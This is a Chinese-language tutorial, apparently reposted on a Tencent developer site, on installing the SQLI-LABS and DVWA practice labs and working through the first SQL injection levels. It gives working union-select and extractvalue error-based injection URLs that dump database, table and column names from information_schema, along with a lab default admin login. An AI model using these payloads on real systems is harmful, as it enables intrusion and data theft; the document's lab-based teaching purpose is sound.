首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

【SQL注入】SQLI-LABS的使用

SQLI-LABS是学习SQL注入的平台。SQL注入是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

一、源码下载

https://github.com/Audi-1/sqli-labs

二、安装说明

1、 git clone https://github.com/Audi-1/sqli-labs.git ,sqli-labs或者直接下载都可以,已经有环境的可以解压到apache目录下,没有环境的windows的用户推荐用phpstudy,安装完phpstudy启动就可以了,大小为35M也不大,可以说是相当方便,然后把下载的sqli-labs-master放在phpstudy的WWW目录下。(mysql默认密码是root,需要改就可以自行改)。如下图所示。

2、打开sql-connections目录下的db-creds.inc,然后修改mysql的用户名和密码。如下图所示。

3、打开浏览器,访问打开sqli-labs的主页,点击Setup/reset Database for labs就可以初始化数据库或者重置数据库,成功后显示。如下图所示。

三、需要的学习的知识

1、基础的Sql语句。

2、url编码。

3、sql注入的基本技巧(information_schema、limit和concat之类的常见函数等的使用),还有双注入查询(也叫报错注入)、布尔盲注和时间盲注。

4、安装DVWA(Damn Vulnerable Web App),下载地址:https://github.com/ethicalhack3r/DVWA,放在phpstudy的www目录下,然后修改config.inc.php.dist中的连接数据库的用户名和密码。然后进入http://localhost/DVWA/setup.php点击Create Database,进入http://localhost/DVWA/login.php,用username是admin,和password为password账户登录。如下图所示。

四、SQL注入基本步骤

1、注入点测试

2、查询字段数

3、判断回显位

4、查询数据库的基本信息

5、爆数据库名

6、爆数据库表名

7、爆字段名

五、使用和练习

1、打开less-1然后开始练习,这是基于单引号的报错注入。

浏览器是的firefox,插件是hackbar,注意下载老版的firefox。mysql的数据库information_schema是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息。关于数据库连接函数concat()、concat_ws()和group_concat(),大家可以自行搜索查看。

爆数据库名:

http://localhost/sqli-labs/Less-1/?id=-1'union select 1,2,concat_ws(char(32,58,32),user(),database(),version())%23

如下图所示。

爆表名:

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 %23

如下图所示。

另外还有extractvalue函数,这里直接贴。

http://localhost/sqli-labs/Less-1/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23

结果如下图所示。

http://localhost/sqli-labs/Less-1/?id=-1 'and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')))%23

结果如下图所示。

2、less-2 基于整形的报错注入

和less-1一样,就是把单引号去掉。

3、less-3 基于单括号的报错注入

payload: ') and extractvalue(1,concat(0x7e,user())) and ('1'='1

4、less-4 基于双引号括号的报错注入

和less-3一样,就是把单引号换成双引号。

六、小结

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180521G1F35W00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券